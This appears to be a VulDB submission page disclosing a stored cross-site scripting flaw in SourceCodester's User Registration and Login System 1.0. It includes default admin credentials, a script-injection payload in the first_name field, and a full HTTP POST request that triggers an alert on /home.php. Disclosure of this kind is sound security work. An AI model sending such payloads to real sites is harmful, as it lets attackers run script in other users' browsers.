| Title | https://www.sourcecodester.com/php/16890/user-registration-and-l User Registration and Login System 1.0 Cross-site Scripting attacks |
|---|
| Description | BUG_Author: hlhyp
vendors: https://www.sourcecodester.com/php/16890/user-registration-and-login-system-using-php-source-code.html
username && password : admin/admin
Vulnerability File: /endpoint/add-user.php ;/home.php
[+] payload: contact_number=1&email=testing%40example.com&first_name=LgyxmpHT--><ScRiPt%20>alert(9221)</ScRiPt><!--&last_name=LgyxmpHT&password=u]H[ww6KrA9F.x-F&username=LgyxmpHT
First:
POST /endpoint/add-user.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/
Content-Length: 164
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Host: 127.0.0.1
Connection: Keep-alive
contact_number=1&email=testing%40example.com&first_name=LgyxmpHT--><ScRiPt%20>alert(9221)</ScRiPt><!--&last_name=LgyxmpHT&password=u]H[ww6KrA9F.x-F&username=LgyxmpHT
Then access /home.php will alert message |
|---|
| Source | ⚠️ https://github.com/qqisee/vulndis/blob/main/xss_add_user.md |
|---|
| User | hlhyp (UID 59415) |
|---|
| Submission | 12/01/2023 09:30 (3 years ago) |
|---|
| Moderation | 12/01/2023 17:05 (8 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 246613 [SourceCodester User Registration and Login System 1.0 /endpoint/add-user.php first_name cross site scripting] |
|---|
| Points | 20 |
|---|